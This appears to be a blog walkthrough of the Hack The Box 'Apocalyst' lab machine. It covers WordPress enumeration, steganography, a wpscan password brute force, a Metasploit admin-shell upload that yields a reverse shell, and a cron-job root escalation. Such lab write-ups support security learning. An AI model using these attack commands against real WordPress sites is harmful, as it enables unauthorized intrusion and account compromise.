In this blog post, I'll share my journey through the "Apocalyst" challenge on Hack The Box, an intermediate-level machine that tests skills in web application enumeration, password cracking, and privilege escalation. The primary focus of this challenge is on exploiting a WordPress installation to gain initial access and then escalating privileges to root.
Vulnerability Overview
The key vulnerabilities exploited in this challenge include:
Weak Passwords: The use of easily guessable passwords allowed unauthorized access to the WordPress admin panel.
Information Disclosure: Sensitive information, such as password hashes, was exposed through improper file permissions, facilitating unauthorized access.
Remote Code Execution (RCE) via WordPress Plugin: Exploiting the WordPress admin panel to upload a malicious plugin enabled remote code execution on the server.
These vulnerabilities exist due to poor security practices, such as inadequate password policies and improper handling of sensitive information, which can lead to unauthorized system access in real-world scenarios.
I began by performing an Nmap scan to identify open ports and services on the target machine. The scan revealed that ports 22 (SSH) and 80 (HTTP) were open. Navigating to http://10.10.10.46/ displayed a default Apache page, indicating that the web server was active but not providing much information. To discover potential subdomains, I added apocalyst.htb to my /etc/hosts file and used the wpscan tool to enumerate themes, plugins, and users:
wpscan --url http://apocalyst.htb/ --enumerate t --enumerate p --enumerate u
This scan revealed a username: falaraki.
Using dirb, I enumerated directories on the web server. The scan discovered a directory named /Rightiousness. Accessing http://10.10.10.46/Rightiousness displayed an image. Suspecting steganography, I used steghide to extract hidden information. This extraction yielded a list.txt file containing potential passwords. Using the obtained username falaraki and the list.txt file, I attempted to brute-force the WordPress login:
wpscan --url http://10.10.10.46/ --username falaraki --wordlist list.txt
This revealed the password: Transclisiation.
With valid credentials, I logged into the WordPress admin panel and used Metasploit's wp_admin_shell_upload module to upload a malicious plugin, granting a reverse shell:
use exploit/unix/webapp/wp_admin_shell_upload
set rhost 10.10.10.46
set username falaraki
set password Transclisiation
exploit
This provided a Meterpreter session.
Within the Meterpreter session, I navigated to /home/falaraki and found a file named .secret containing a base64-encoded string. Decoding it revealed a password. Using this password, I switched to the falaraki user via SSH. After logging in, I found the user.txt flag. To escalate privileges, I used the LinEnum script to identify potential vectors. This led me to discover a cron job running a script with write permissions. By modifying this script to spawn a root shell, I obtained the root.txt flag.